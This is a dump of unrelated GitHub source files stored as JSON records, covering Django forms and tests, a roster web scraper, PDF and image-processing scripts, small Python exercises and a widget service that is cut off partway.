]\n\n\nclass TemplateForm(forms.ModelForm):\n class Meta:\n model = Template\n fields = ['name', 'style_sheet']\n\n\nclass UserRegisterForm(UserCreationForm):\n email = forms.EmailField()\n\n class Meta:\n model = User\n fields = ['username', 'email', 'password1', 'password2']\n","repo_name":"python-discord/summer-code-jam-2020","sub_path":"jolly-jellyfish/src/page_maker/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"34"} +{"seq_id":"33950208342","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.contrib.auth import get_user_model\nfrom django.db import migrations\n\n\ndef add_data(apps, schema):\n User = get_user_model()\n User.objects.create_superuser('admin', 'admin@example.com', 'admin')\n\n ExampleModel = apps.get_model('tests', \"ExampleModel\")\n for i in range(10):\n ExampleModel.objects.create(title=\"example {}\".format(i))\n\n\nclass Migration(migrations.Migration):\n dependencies = [\n ('tests', '0001_initial'),\n ]\n\n operations = [\n migrations.RunPython(add_data)\n 
]\n","repo_name":"Apkawa/django-admin-view","sub_path":"tests/migrations/0002_data.py","file_name":"0002_data.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15804627695","text":"import urllib\nimport re\n\n#url = raw_input(\"Please enter the URL to scrape: \")\nlastId = raw_input(\"Please enter the numeric ID of the highest athletic ID: \")\nsport = raw_input(\"Please enter the sport: \")\n\nurl = \"http://pacifictigers.com/sports/m-wpolo/2016-17/roster\"\n\ndef removeTabs(htmltext):\n newString = \"\"\n for c in htmltext:\n if (c == '\\r') or (c == '\\n') or (c == '\\t'):\n pass\n else:\n newString+=c\n return newString\n\nregex = 'title=\"Player\\'s Bio\">(.+?)'\nregex2 = '(.+?)' #will be an array of positions that corresponds to names\npattern = re.compile(regex)\npattern2 = re.compile(regex2)\n\nhtmlfile = urllib.urlopen(url)\nhtmltext = htmlfile.read()\n\nraw_html = removeTabs(htmltext)\n\nwith open(\"Raw_HTML.txt\", \"w\") as file:\n file.write(raw_html)\n\nnames = re.findall(pattern,htmltext)\npos = re.findall(pattern2, raw_html)\n\n\ndef removeWhitespace(pos):\n newPos = []\n for position in pos:\n newPos.append(position.strip(' '))\n return newPos\n\n\npos = removeWhitespace(pos)\n\nwith open(\"Output.txt\", \"w\") as text_file:\n for index, n in enumerate(names):\n insertStatement = \"insert into athlete values(\" + str(int(lastId)+index) + \", '\" + n + \"', '\"+ sport + \"', '\" + pos[index]+\"', 0.00);\"\n text_file.write(insertStatement+\"\\n\")","repo_name":"jkaehler/web_scraper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"11157892099","text":"import pdfplumber\nfrom sklearn.cluster import OPTICS\nimport numpy as np\nimport cv2\nimport pandas as pd\n\nKEEP_BLANK_CHARS = False\nN_SAMPLES = 3\n\nif __name__ == \"__main__\":\n with pdfplumber.open(\"samples/sample4.pdf\") as pdf:\n p0 = pdf.pages[0]\n im = p0.to_image()\n words_obj1 = p0.extract_words(keep_blank_chars=KEEP_BLANK_CHARS,\n #x_tolerance=10,\n #y_tolerance=20\n )[:-1]\n words_obj2 = p0.extract_words(keep_blank_chars=KEEP_BLANK_CHARS,\n # x_tolerance=10,\n # y_tolerance=20\n )[1:]\n\n color = [\"red\",\"blue\",\"green\",\"black\",\"yellow\",\"grey\",\"red\",\"blue\",\"green\",\"black\"]\n bbox = []\n for i, (item1, item2) in enumerate(zip(words_obj1, words_obj2)):\n if item1['text'] == \"X\" and item2['text'] == \")\":\n im.draw_rects((item1['x0'], item1['top'], item2['x1'], item2['bottom']), stroke=color[i])\n\n #im.draw_rects(bbox)\n\n im.save(\"samples/sample_out.png\")\n cim = cv2.imread(\"samples/sample_out.png\")\n cv2.imshow(\"output\", cim)\n cv2.waitKey(0)\n","repo_name":"shezgone/pdf_ocr_api","sub_path":"pdf_area.py","file_name":"pdf_area.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"4469032293","text":"headline = ['caesId','id','name','sex','age','preliminary','CC','HOPI','diagnosis','diagnosisTCM','change','prescription','other']\r\ndictionary = {'caesId':'病例编号','id':'患者登记号','name':'姓名','sex':'性别','age':'年龄','preliminary':'初诊复诊','CC':'主诉','HOPI':'现病史','change':'较前变化的症状','prescription':'处方','diagnosis':'西医诊断','diagnosisTCM':'中医诊断','other':'备注'}\r\n\r\ndef caseobj(caseId):\r\n case = {}\r\n for i in range(len(headline)):\r\n cn = 
dictionary[headline[i]]\r\n        if i == 0:\r\n            case[cn] = caseId\r\n        elif i in [1,2,3,4,5,6]:\r\n            string = input('{0}:'.format(cn))\r\n            case[cn] = string\r\n            print('{0}:{1}'.format(cn,string))\r\n        elif i == 7:\r\n            TempHOPI = ''\r\n            while True:\r\n                string = input('{0}:'.format(cn))\r\n                if string != 'end':\r\n                    TempHOPI = TempHOPI + string\r\n                else:\r\n                    break\r\n            case[cn] = TempHOPI\r\n            print('{0}:{1}'.format(cn,TempHOPI))\r\n        elif i in [8,9,12]:\r\n            case[cn] = []\r\n            while True:\r\n                string = input('{0}:'.format(cn))\r\n                if string != 'end':\r\n                    case[cn].append(string)\r\n                else:\r\n                    break\r\n            print('{0}:{1}'.format(cn,case[cn]))\r\n        elif i == 10:\r\n            case[cn] = {}\r\n            while True:\r\n                change = input('较前改变的症状:')\r\n                how = input('如何改变:')\r\n                if change != 'end':\r\n                    case[cn][change] = how\r\n                else:\r\n                    break\r\n            print('{0}:{1}'.format(cn,case[cn]))\r\n        elif i == 11:\r\n            case[cn] = []\r\n            while True:\r\n                jishu = input('剂数:')\r\n                jixing = input('剂型:')\r\n                fangfa = input('服用方法:')\r\n                if jishu == 'end' or jixing == 'end' or fangfa == 'end':\r\n                    break\r\n                else:\r\n                    fang = [jishu,jixing,fangfa]\r\n                    fangyao = {}\r\n                    while True:\r\n                        yao = input('药名:')\r\n                        quantity = input('剂量:')\r\n                        if yao == 'end' or quantity == 'end':\r\n                            break\r\n                        else:\r\n                            if quantity[-1].isdigit():\r\n                                quantity = quantity + 'g'\r\n                            fangyao[yao] = quantity\r\n                    fang.append(fangyao)\r\n                    case[cn].append(fang)\r\n            print('{0}:{1}'.format(cn,case[cn]))\r\n    return case\r\ndata = caseobj('000000')\r\nprint(data)","repo_name":"mengcanzhai/caseSystem_forTCM","sub_path":"debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":2829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
+{"seq_id":"23467506863","text":"from rest_framework.test import APITestCase, RequestsClient\nfrom rest_framework import status\n\n\nclass QuestionAPITestCase(APITestCase):\n\n    def test_question_post(self):\n        print(\"Test question post\")\n        client = RequestsClient()\n        url = 'http://127.0.0.1:8000/api/question/'\n        data = {\"name\": \"John\", \"question\": \"Where are my socks?\"}\n        response = client.post(url=url, data=data)\n        self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n\nclass AnswerAPITestCase(APITestCase):\n\n    def test_answer_get(self):\n        print(\"Test answer get\")\n        client = RequestsClient()\n        url = 'http://127.0.0.1:8000/api/answer/'\n        response = client.get(url=url)\n        self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n\nclass FAQAPITestCase(APITestCase):\n\n    def test_faq_get(self):\n        print(\"Test FAQ get\")\n        client = RequestsClient()\n        url = 'http://127.0.0.1:8000/api/faq/'\n        response = client.get(url=url)\n        self.assertEqual(response.status_code, status.HTTP_200_OK)","repo_name":"diushes/myownrel","sub_path":"ask_a_question/tests/test_view.py","file_name":"test_view.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
+{"seq_id":"20467046020","text":"import dwave\nimport dimod\nimport numpy as np\n\nchains1 = [(0, 1, 2), (3, 4)]\nsamples1 = np.array([[1, 1, 0, 0, 0],\n                     [1, 1, 1, 0, 0],\n                     [1, 1, 1, 0, 1],\n                     [1, 1, 1, 1, 1],\n                     ], dtype=np.int8)\n\n# ? unembedded, idx = dwave.embedding.chain_breaks.discard(samples, chains)\n# ? unembedded, idx = dwave.embedding.chain_breaks.majority_vote(samples, chains)\n# ? 
unembedded, idx = dwave.embedding.chain_breaks.weighted_random(samples, chains)\n# print(idx)\n# print(unembedded)\n\nh = {'a': 0, 'b': 0, 'c': 0}\nJ = {('a', 'b'): 1, ('b', 'c'): 1, ('a', 'c'): 1}\nbqm = dimod.BinaryQuadraticModel.from_ising(h, J)\nembedding = {'a': [0], 'b': [1], 'c': [2, 3]}\n# ? cbm = dwave.embedding.chain_breaks.MinimizeEnergy(bqm, embedding)\nsamples2 = np.array([[+1, -1, +1, +1],\n [-1, -1, -1, -1],\n [-1, -1, +1, -1],\n [+1, +1, -1, +1]],\n dtype=np.int8)\nchains2 = [embedding['a'], embedding['b'], embedding['c']]\n# unembedded, idx = cbm(samples2, chains2)\n# print(unembedded)\n","repo_name":"kitamuyu/pyqubo-tutorial","sub_path":"chapter6/chains.py","file_name":"chains.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"1605247495","text":"import asyncio\nimport gc\nimport hashlib\nimport logging\nimport os\nimport sys\nimport traceback\nfrom concurrent.futures import Executor\nfrom typing import List, Callable, Dict\n\nfrom PIL import Image\n\nimport panoptic.compute as compute\nfrom panoptic.core import db\nfrom panoptic.models import ImageImportTask\n\nlogger = logging.getLogger('ProcessQueue')\n\n\nclass ProcessQueue:\n def __init__(self, executor: Executor):\n self.executor = executor\n\n self._queue = asyncio.Queue()\n self._workers: List[asyncio.Task] = []\n self._working: Dict[int, bool] = {}\n self.done_callback = None\n\n def start_workers(self, workers=1):\n if self._workers:\n return\n for i in range(workers):\n self._workers.append(asyncio.create_task(self._process_queue(i)))\n\n def add_task(self, task):\n self._queue.put_nowait(task)\n\n def done(self):\n return self._queue.qsize() == 0\n\n async def _process_queue(self, worker_id: int):\n while True:\n try:\n # if nothing left to do remove working flag\n if self.done():\n self._working[worker_id] = False\n\n task = await self._queue.get()\n # set working flag\n self._working[worker_id] = True\n\n res = await self._process_task(task)\n if self.done_callback:\n\n is_last = self.done() and self.get_working_nb() == 1\n self.done_callback(res, is_last)\n except Exception as e:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n logger.error(\"\".join(traceback.format_exception(exc_type, exc_value, exc_traceback)))\n logger.error(e)\n\n def get_working_nb(self):\n working = [v for v in self._working.values() if v]\n return len(working)\n\n async def _process_task(self, task):\n raise NotImplementedError()\n\n async def _execute_in_process(self, fnc: Callable, *args):\n return await asyncio.wrap_future(self.executor.submit(fnc, *args))\n\n\nclass ImportImageQueue(ProcessQueue):\n def add_task(self, task: ImageImportTask):\n super().add_task(task)\n\n async def _process_task(self, task: ImageImportTask):\n # print('process: ', task.image_path, task.folder_id)\n name = task.image_path.split(os.sep)[-1]\n extension = name.split('.')[-1]\n folder_id = task.folder_id\n\n db_image = await db.has_image_file(folder_id, name, extension)\n if db_image:\n return db_image\n\n sha1, url, width, height = await self._execute_in_process(self._import_image, task.image_path)\n\n image = await db.add_image(folder_id, name, extension, sha1, url, width, height)\n # print(f'imported image: {image.id} : {image.sha1}')\n return image\n\n @staticmethod\n def _import_image(file_path):\n image = Image.open(file_path)\n width, height = image.size\n sha1_hash = hashlib.sha1(image.tobytes()).hexdigest()\n # TODO: gérer l'url 
statique quand on sera en mode serveur\n # url = os.path.join('/static/' + file_path.split(os.getenv('PANOPTIC_ROOT'))[1].replace('\\\\', '/'))\n url = f\"/images/{file_path}\"\n image = image.convert('RGB')\n mini = image.copy()\n mini.thumbnail(size=(200, 200))\n mini.save(os.path.join(os.environ['PANOPTIC_DATA'], \"mini\", sha1_hash + '.jpeg'), optimize=True, quality=30)\n\n del image\n del mini\n # gc.collect()\n\n return sha1_hash, url, width, height\n\n\nclass ComputeVectorsQueue(ProcessQueue):\n async def _process_task(self, task):\n image_id: int = task\n image = (await db.get_images(ids=[image_id]))[0]\n computed = await db.get_sha1_computed_values([image.sha1])\n if computed:\n return computed\n\n folder = await db.get_folder(image.folder_id)\n file_path = f\"{folder.path}/{image.name}\"\n ahash, vector = await self._execute_in_process(self.compute_image, file_path)\n res = await db.set_computed_value(sha1=image.sha1, ahash=ahash, vector=vector)\n del vector\n # gc.collect()\n print('computed image: ', image_id, ' : ', res.sha1)\n return res\n\n @staticmethod\n def compute_image(image_path: str):\n image = Image.open(image_path)\n image = image.convert('RGB')\n ahash = str(compute.to_average_hash(image))\n # TODO: find a way to access all the images for PCA\n vector = compute.to_vector(image)\n\n del image\n # gc.collect()\n\n return ahash, vector\n","repo_name":"CERES-Sorbonne/Panoptic","sub_path":"panoptic_back/panoptic/core/process_queue.py","file_name":"process_queue.py","file_ext":"py","file_size_in_byte":4635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7445850806","text":"if __name__== \"__main__\":\n x= int(input(\"请输入一个5位数整数:\"))\n if x<10000or x>99999:\n print(\"输入错误\")\n else:\n ten_thousand= x//10000\n thousand= x%10000//1000\n ten= x%100//10\n indiv= x%10\n if indiv== ten_thousand and ten== thousand:\n print(\"%d是回文数\"%x)\n else:\n print(\"%d不是回文数\"%x)\n ","repo_name":"ljflisp/ljflisp","sub_path":"python文件/python中文文件/回文诗.py","file_name":"回文诗.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"16600434513","text":"import sys\n\n\ndef work1():\n a = 4\n print(type(a))\n a = 'esw'\n print(type(a))\n a = 2.1\n print(type(a))\n\n\n# Создайте в переменной data список значений разных\n# типов перечислив их через запятую внутри квадратных скобок.\n# Для каждого элемента в цикле выведите:\n# порядковый номер начиная с единицы\n# значение\n# адрес в памяти\n# размер в памяти\n# хэш объекта\n# результат проверки на целое число только если он положительный\n# результат проверки на строку только если он положительный\n#\n# *Добавьте в список повторяющиеся элементы и сравните на результаты.\n\n\ndef work2():\n my_list = [21, 456, 'hello', True, 3, 'hello']\n for i, item in enumerate(my_list, 1):\n number_output = 'Это целое число' if isinstance(item, int) else ''\n str_output = 'Это строка' if isinstance(item, str) else ''\n print(f'номер: {i}; '\n f'значение: {item}; '\n f'Хэш объекта - {hash(item)};'\n f'{number_output}'\n f'{str_output}')\n\n\n# Напишите программу, которая получает целое число\n# и возвращает его двоичное, восьмеричное строковое представление.\n# Функции bin и oct используйте для проверки своего результата.\n\n# *Дополнительно\n# Попробуйте избежать дублирования кода в преобразованиях к разным системам счисления\n# Избегайте магических чисел\n# Добавьте аннотацию типов где это 
возможно\nBINARY_SYSTEM = 2\nOCTAL_SYSTEM = 8\n\n\ndef system_selection() -> int:\n system: int = 0\n\n while system != BINARY_SYSTEM and system != OCTAL_SYSTEM:\n system = int(input('\\nВыберите систему счисления\\n'\n '2 - двоичная\\n'\n '8 - восьмиричная\\n'))\n return system\n\n\ndef transfer_system(number: int, system: int) -> str:\n result: str = ''\n\n while number != 0:\n mod: str = str(number % system)\n result = mod + result\n number //= system\n\n return result\n\n\ndef work3():\n number: int = int(input('введите число:\\n'))\n\n selection: int = system_selection()\n transfer: str = transfer_system(number, selection)\n\n print(f'\\nРезультат: {transfer}')\n print(f'двоичная система: {bin(number)[2:]}')\n print(f'восьмеричная система: {oct(number)[2:]}')\n\n\n# Напишите программу, которая вычисляет площадь круга и\n# длину окружности по введённому диаметру.\n# Диаметр не превышает 1000 у.е.\n# Точность вычислений должна составлять\n# не менее 42 знаков после запятой.\n\nfrom decimal import Decimal, getcontext\nfrom math import pi\n\ngetcontext().prec = 42\nnum_pi = Decimal(pi)\n\ndiametr: Decimal = 0\nwhile diametr not in range(1, 1001):\n diametr = Decimal(input('введите диаметр от 1 до 1000:\\n'))\n\narea: Decimal = (num_pi * diametr ** 2 / 4)\nlength: Decimal = (num_pi * diametr)\n\nprint(f'площадь = {area}')\nprint(f'длина: {length}')\n","repo_name":"FominaCathy/Python_part_2","sub_path":"SEMINARS_new/seminar_2.py","file_name":"seminar_2.py","file_ext":"py","file_size_in_byte":3787,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"37729386518","text":"import pygame\nclass Bullet1:\n def __init__(self, game_settings, screen, ship) -> None:\n self.screen = screen\n self.ship = ship\n self.game_settings = game_settings\n\n self.image = pygame.image.load('img/bullet1.png').convert_alpha()\n\n self.rect = self.image.get_rect()\n\n self.rect.midbottom = self.ship.rect.midtop\n self.y = float(self.ship.rect.centery)\n\n self.mask = pygame.mask.from_surface(self.image)\n\n def update(self, x):\n if self.y < 10:\n self.rect.centerx = x\n\n self.y -= self.game_settings.bullet_speed_factor\n self.rect.centery = self.y\n if self.y < 0:\n self.reset()\n\n def blitme(self):\n # 指定位置画飞船\n self.screen.blit(self.image, self.rect)\n \n def reset(self):\n self.y = float(self.ship.rect.centery)","repo_name":"adrablezzz/python","sub_path":"py_games/plane/bullet.py","file_name":"bullet.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"1594218490","text":"from django.test import TestCase\nfrom ..models import *\nfrom django.core.files.uploadedfile import SimpleUploadedFile\n\n\nclass RestaurantTest(TestCase):\n\n def setUp(self):\n Restaurant.objects.create(title=\"Restaurant1\")\n\n def test_instance(self):\n obj = Restaurant.objects.get(id=1)\n self.assertEqual(\n obj.title, \"Restaurant1\")\n\n\nclass EmployeeTest(TestCase):\n\n def setUp(self):\n Employee.objects.create(username='Employee1', name='Employee1 full name')\n\n def test_instance(self):\n obj = Employee.objects.get(username=\"Employee1\")\n self.assertEqual(\n obj.username, \"Employee1\")\n self.assertEqual(\n obj.name, \"Employee1 full name\")\n\n\nclass MenuTest(TestCase):\n\n def setUp(self):\n file = SimpleUploadedFile(\"pdf_for_text.pdf\", b\"file_content\", content_type=\"text/pdf\")\n Restaurant.objects.create(title=\"Restaurant1\")\n restaurant = 
Restaurant.objects.get(id=1)\n Menu.objects.create(restaurant_id=restaurant.id, filepath=file)\n\n def test_instance(self):\n obj = Menu.objects.get(id=1)\n self.assertEqual(\n obj.restaurant_id, 1)\n\n\nclass VoteTest(TestCase):\n\n def setUp(self):\n file = SimpleUploadedFile(\"pdf_for_text.pdf\", b\"file_content\", content_type=\"text/pdf\")\n Restaurant.objects.create(title='Restaurant1')\n Employee.objects.create(username='Employee1', name='Employee1 full name')\n restaurant = Restaurant.objects.get(id=1)\n employee = Employee.objects.get(id=1)\n Menu.objects.create(restaurant_id=restaurant.id, filepath=file)\n\n menu = Menu.objects.get(id=1)\n Vote.objects.create(employee_id=employee.id, menu_id=menu.id)\n\n def test_instance(self):\n obj = Vote.objects.get(id=1)\n self.assertEqual(obj.employee_id, 1)\n self.assertEqual(obj.menu_id, 1)\n\n","repo_name":"DaniloRodrigo/corner_case","sub_path":"menu/tests/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"43125577635","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.views.generic import TemplateView\nfrom django.shortcuts import render\nfrom django.http import HttpResponseRedirect, Http404\nfrom django.urls import reverse\nimport logging\nimport six\n\nfrom .models import Puzzle, Entry, Clue\nfrom .forms import EntryForm\n\n# view for user to start new drill\nclass LogInView(TemplateView):\n template_name = 'login.html'\n\n def get_context_data(self, **kwargs):\n context = super(LogInView, self).get_context_data(**kwargs)\n\n # initialize new session\n self.request.session['total'] = 0\n self.request.session['correct'] = 0\n self.request.session['repeat'] = False\n\n if self.request.session.has_key('clue_id'):\n del self.request.session['clue_id']\n\n return context\n\n# view to present random clue with information about entry\nclass DrillView(TemplateView):\n template_name = 'drill.html'\n\n def get_context_data(self, **kwargs):\n context = super(DrillView, self).get_context_data(**kwargs)\n repeat = False\n\n # check session if clue is repeated\n if self.request.session.has_key('repeat'):\n repeat = self.request.session['repeat']\n\n # check if clue is being repeated, get clue instance\n if repeat:\n clue_id = self.request.session['clue_id']\n\n try:\n random_clue = Clue.objects.get(pk=clue_id)\n except Clue.DoesNotExist:\n raise Http404(\"Such Clue Does Not Exist\")\n\n else:\n # Initialize values for new clue instance\n random_clue = Clue.objects.order_by(\"?\").first()\n clue_id = random_clue.id\n\n self.request.session['clue_id'] = clue_id\n self.request.session['total'] += 1\n self.request.session['success'] = False\n\n # add data to context for templates\n context['entry_form'] = EntryForm()\n context['random_clue'] = random_clue\n context['repeat'] = repeat\n\n context['total'] = self.request.session['total']\n context['correct'] = self.request.session['correct']\n\n return context\n\n\n def post(self, request, *args, **kwargs):\n # check if clue id exists in current session / if not, redirect to drill page\n if not request.session.has_key('clue_id'):\n self.request.session['repeat'] = False\n return HttpResponseRedirect(reverse('drill'))\n\n # Get clue ID\n clue_id = self.request.session['clue_id']\n\n # Fetch POST field from Entry Form\n entry_form = EntryForm(request.POST or None)\n entry_text = entry_form['entry_text'].value()\n\n # validate 
entry text\n if not isinstance(entry_text, six.text_type):\n raise Exception('Entry Text must be a string')\n\n # Get Clue Data and find match with entry text\n clue_match = Clue.objects.get(pk=clue_id)\n entry_match = Entry.objects.filter(entry_text=entry_text.upper()).first()\n\n logger = logging.getLogger(__name__)\n if entry_match == clue_match.entry:\n # keep track of correct answers (int), wrong answer (bool), and success qnw3\n logger.info('Match found')\n self.request.session['correct'] += 1\n self.request.session['repeat'] = False\n self.request.session['success'] = True\n\n # Redirects to the view product of product details and for review\n return HttpResponseRedirect(reverse('answer'))\n\n logger.info(\"Match not found\")\n request.session['repeat'] = True\n return HttpResponseRedirect(reverse('drill'))\n\n\n\n\n# view to congratulates the user on their success\nclass AnswerView(TemplateView):\n template_name = 'answer.html'\n\n def get_context_data(self, **kwargs):\n context = super(AnswerView, self).get_context_data(**kwargs)\n\n # check if clue id exists in current session / if not, redirect to drill page\n if not self.request.session.has_key('clue_id'):\n return HttpResponseRedirect(reverse('drill'))\n\n # reset repeat clue option to default\n if self.request.session.has_key('repeat'):\n self.request.session['repeat'] = False\n\n # get clue ID from current session\n clue_id = self.request.session['clue_id']\n\n # get clue information from DB\n try:\n clue = Clue.objects.get(pk=clue_id)\n\n except Clue.DoesNotExist:\n raise Http404(\"Such Clue Does Not Exist\")\n\n # get information for puzzles that include clue text\n puzzles = Puzzle.objects.get_clue_puzzles(clue.clue_text)\n\n # get information of other clues with the same entry\n other_clues = Clue.objects.filter(entry=clue.entry)\n\n # add data to context for templates\n context['puzzles'] = puzzles\n context['clue'] = clue\n context['other_clues'] = other_clues\n\n context['total'] = self.request.session['total']\n context['correct'] = self.request.session['correct']\n context['success'] = self.request.session['success']\n\n return context\n","repo_name":"hassanbadru/xword_task","sub_path":"xword_data/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"18208836623","text":"import pprint\r\nfrom tempfile import mktemp\r\nfrom urllib.request import urlopen, Request, urlretrieve\r\nfrom zipfile import ZipFile\r\n\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\n\r\nURL = 'https://archaeologydataservice.ac.uk/archives/view/hayton_eh_2007/'\r\n\r\n\r\nURL='https://archaeologydataservice.ac.uk/archives/view/alanvince_eh_2010/'\r\n\r\npage = requests.get(URL)\r\npp = pprint.PrettyPrinter(indent=4)\r\n\r\nsoup = BeautifulSoup(page.content,'html.parser')\r\n\r\nmetadata=soup.find( id='metadata').find('ul','dlMenu').find_all('li')\r\ndownloads_link=None\r\nfor el in metadata:\r\n if el.find('a').get('href').find('downloads')!=-1:\r\n downloads_link=el.find('a').get('href')\r\nif downloads_link!=None:\r\n downloads_url=URL+downloads_link\r\n\r\n\r\npage_downloads = requests.get(downloads_url).content\r\n\r\n\r\nsoup = BeautifulSoup(page_downloads,'html.parser')\r\narchive=soup.find(\"div\", {\"id\": \"archive\"})\r\n\r\nlinks = archive.find_all('a')\r\n\r\nfor el in links:\r\n # if el['href'].find('form')!=-1:\r\n page = requests.get(URL+el['href'])\r\n soup = BeautifulSoup(page.content, 
'html.parser')\r\n links2 = soup.find_all('a')\r\n for link in links2:\r\n if link.has_attr('href'):\r\n href=link['href']\r\n if '.zip' in href:\r\n # remoteZip = urlopen(Request(URL+href))\r\n file_name = href.rpartition('/')[-1]\r\n file=file_name.split('?')\r\n filename = file[0]\r\n\r\n destDir = mktemp(filename.split(\".\")[0])\r\n theurl = URL+href\r\n name, hdrs = urlretrieve(theurl, filename)\r\n thefile = ZipFile(filename)\r\n thefile.extractall(destDir)\r\n thefile.close()\r\n\r\n # file_name = href.rpartition('/')[-1]\r\n # file=file_name.split('?')\r\n # local_file = open(file_name[0], 'wb+')\r\n # local_file.write(remoteZip.read())\r\n # local_file.close()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"bgir2464/dataprocessing","sub_path":"page_scraper.py","file_name":"page_scraper.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9502923317","text":"\"\"\"Service for widget management.\"\"\"\nfrom http import HTTPStatus\n\nfrom met_api.constants.membership_type import MembershipType\nfrom met_api.exceptions.business_exception import BusinessException\nfrom met_api.models.widget import Widget as WidgetModel\nfrom met_api.models.widget_item import WidgetItem\nfrom met_api.schemas.widget import WidgetSchema\nfrom met_api.schemas.widget_item import WidgetItemSchema\nfrom met_api.services import authorization\nfrom met_api.utils.roles import Role\n\n\nclass WidgetService:\n \"\"\"Widget management service.\"\"\"\n\n @staticmethod\n def get_widgets_by_engagement_id(engagement_id):\n \"\"\"Get widgets by engagement id.\"\"\"\n widget_schema = WidgetSchema(many=True)\n widgets_records = WidgetModel.get_widgets_by_engagement_id(engagement_id)\n widgets = widget_schema.dump(widgets_records)\n return widgets\n\n @staticmethod\n def get_widget_items_by_widget_id(widget_id):\n \"\"\"Get widget items by widget id.\"\"\"\n widget_item_schema = WidgetItemSchema(many=True)\n widget_items_records = WidgetItem.get_widget_items_by_widget_id(widget_id)\n widget_items = widget_item_schema.dump(widget_items_records)\n return widget_items\n\n @staticmethod\n def create_widget(widget_data, engagement_id):\n \"\"\"Create widget item.\"\"\"\n one_of_roles = (\n MembershipType.TEAM_MEMBER.name,\n Role.EDIT_ENGAGEMENT.value\n )\n authorization.check_auth(one_of_roles=one_of_roles, engagement_id=engagement_id)\n\n if widget_data.get('engagement_id', None) != int(engagement_id):\n raise ValueError('widget data has engagement id for a different engagement')\n\n sort_index = WidgetService._find_higest_sort_index(engagement_id)\n\n widget_data['sort_index'] = sort_index + 1\n created_widget = WidgetModel.create_widget(widget_data)\n return WidgetSchema().dump(created_widget)\n\n @staticmethod\n def _find_higest_sort_index(engagement_id):\n # find the highest sort order of the engagement\n sort_index = 0\n widgets = WidgetModel.get_widgets_by_engagement_id(engagement_id)\n if widgets:\n # Find the largest in the existing widgest\n sort_index = max(widget.sort_index for widget in widgets)\n return sort_index\n\n @staticmethod\n def sort_widget(engagement_id, widgets: list, user_id=None):\n \"\"\"Sort widgets.\"\"\"\n WidgetService._validate_widget_ids(engagement_id, widgets)\n\n one_of_roles = (\n MembershipType.TEAM_MEMBER.name,\n Role.EDIT_ENGAGEMENT.value\n )\n authorization.check_auth(one_of_roles=one_of_roles, engagement_id=engagement_id)\n\n widget_sort_mappings = [{\n 'id': 
widget.get('id'),\n            'sort_index': index + 1,\n            'updated_by': user_id\n        } for index, widget in enumerate(widgets)\n        ]\n\n        WidgetModel.update_widgets(widget_sort_mappings)\n\n    @staticmethod\n    def update_widget(engagement_id, widget_id, widget_data: dict, user_id=None):\n        \"\"\"Update a widget.\"\"\"\n        WidgetService._verify_widget(widget_id)\n\n        widget_data['updated_by'] = user_id\n\n        one_of_roles = (\n            MembershipType.TEAM_MEMBER.name,\n            Role.EDIT_ENGAGEMENT.value\n        )\n        authorization.check_auth(one_of_roles=one_of_roles, engagement_id=engagement_id)\n\n        updated_widget = WidgetModel.update_widget(engagement_id, widget_id, widget_data)\n        return WidgetSchema().dump(updated_widget)\n\n    @staticmethod\n    def _validate_widget_ids(engagement_id, widgets):\n        \"\"\"Validate if widget ids belong to the engagement.\"\"\"\n        eng_widgets = WidgetModel.get_widgets_by_engagement_id(engagement_id)\n        widget_ids = [widget.id for widget in eng_widgets]\n        input_widget_ids = [widget_item.get('id') for widget_item in widgets]\n        if len(set(widget_ids) - set(input_widget_ids)) > 0:\n            raise BusinessException(\n                error='Invalid widgets.',\n                status_code=HTTPStatus.BAD_REQUEST)\n\n    @staticmethod\n    def _verify_widget(widget_id):\n        \"\"\"Verify if widget exists.\"\"\"\n        widget = WidgetModel.get_widget_by_id(widget_id)\n        if not widget:\n            raise KeyError(f'Widget {widget_id} does not exist')\n        return widget\n\n    @staticmethod\n    def create_widget_items_bulk(widget_items: list, user_id):\n        \"\"\"Create widget items in bulk.\"\"\"\n        for item in widget_items:\n            item['created_by'] = user_id\n            item['updated_by'] = user_id\n\n        created_widgets_records = WidgetItem.create_all_widget_items(widget_items)\n        return WidgetItemSchema(many=True).dump(created_widgets_records)\n\n    def create_added_widget_items(self, widget_items: list, widget_items_db: list, user_id):\n        \"\"\"Get the 